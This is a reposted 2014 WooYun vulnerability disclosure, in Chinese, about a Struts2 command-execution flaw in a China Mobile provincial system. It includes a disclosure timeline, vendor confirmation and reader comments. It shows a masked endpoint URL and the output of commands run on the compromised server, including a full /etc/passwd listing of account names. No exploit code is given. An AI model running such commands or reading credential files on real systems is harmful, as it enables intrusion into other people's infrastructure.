中国移动某省系统存在s2命令执行getshell

admin
admin
admin
145391
文章
119
评论
2015年8月10日20:36:59评论251 views字数 231阅读0分46秒阅读模式
摘要

2014-11-14: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经确认,细节仅向厂商公开
2014-11-24: 细节向核心白帽子及相关领域专家公开
2014-12-04: 细节向普通白帽子公开
2014-12-14: 细节向实习白帽子公开
2014-12-27: 细节向公众公开

漏洞概要 关注数(5) 关注此漏洞

缺陷编号: WooYun-2014-83004

漏洞标题: 中国移动某省系统存在s2命令执行getshell

相关厂商: 中国移动

漏洞作者: D_in

提交时间: 2014-11-14 16:21

公开时间: 2014-12-27 16:22

漏洞类型: 命令执行

危害等级: 高

自评Rank: 12

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: struts

0人收藏

漏洞详情

披露状态:

2014-11-14: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经确认,细节仅向厂商公开
2014-11-24: 细节向核心白帽子及相关领域专家公开
2014-12-04: 细节向普通白帽子公开
2014-12-14: 细节向实习白帽子公开
2014-12-27: 细节向公众公开

简要描述:

无聊检测,提前通知了厂商,称只是当时防火墙关闭了一下

详细说明:

该命令执行的漏洞存在于广西移动渠道督导系统

中国移动某省系统存在s2命令执行getshell

http://**.**.**.**:80/dudao/validateAction.action

一些命令执行的结果

code 区域 
Whoami: lx100
 WebPath: /lx100/tomcat7/webapps/dudao/
 id
 uid=1500(lx100) gid=1500(lx100) groups=1600(cmopftp)
 
 cat /etc/passwd
 root:!:0:0::/:/usr/bin/ksh
 daemon:!:1:1::/etc:
 bin:!:2:2::/bin:
 sys:!:3:3::/usr/sys:
 adm:!:4:4::/var/adm:
 uucp:!:5:5::/usr/lib/uucp:
 guest:!:100:100::/home/guest:
 nobody:!:4294967294:4294967294::/:
 lpd:!:9:4294967294::/:
 lp:*:11:11::/var/spool/lp:/bin/false
 invscout:*:6:12::/var/adm/invscout:/usr/bin/ksh
 snapp:*:200:13:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
 ipsec:*:201:1::/etc/ipsec:/usr/bin/ksh
 nuucp:*:7:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
 esaadmin:*:8:0::/var/esa:/usr/bin/ksh
 sshd:*:202:201::/var/empty:/usr/bin/ksh
 liwy:!:203:1::/home/liwy:/usr/bin/ksh
 backadm:!:204:1::/home/backadm:/usr/bin/ksh
 aiuap:!:1441:1441::/home/aiuap:/usr/bin/ksh
 bnmsismp:!:800:800::/bnms/ismp:/usr/bin/ksh
 lx100:!:1500:1500::/lx100:/usr/bin/ksh
 cmopftp:!:1600:1600::/lx100/channelsyndata:/usr/bin/ksh
 smpuser:!:205:1::/home/smpuser:/usr/bin/ksh
 weiyy:!:206:1::/home/weiyy:/usr/bin/ksh
 zhongwei:!:207:1::/home/zhongwei:/usr/bin/ksh
 huangxn:!:208:1::/home/huangxn:/usr/bin/ksh

漏洞证明:

中国移动某省系统存在s2命令执行getshell

中国移动某省系统存在s2命令执行getshell

修复方案:

是装防火墙比较好还是打补丁比较好

版权声明:转载请注明来源 D_in@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-11-14 17:56

厂商回复:

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-11-13 11:18 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

    1

    关闭了WAF?哪里的

  2. 2014-12-05 10:54 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

    1

    怪事

  3. 2014-12-05 12:57 | D_in ( 普通白帽子 | Rank:423 漏洞数:65 | 到我嘴里来)

    1

    @wefgod 哪里怪了,wefgod大牛

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin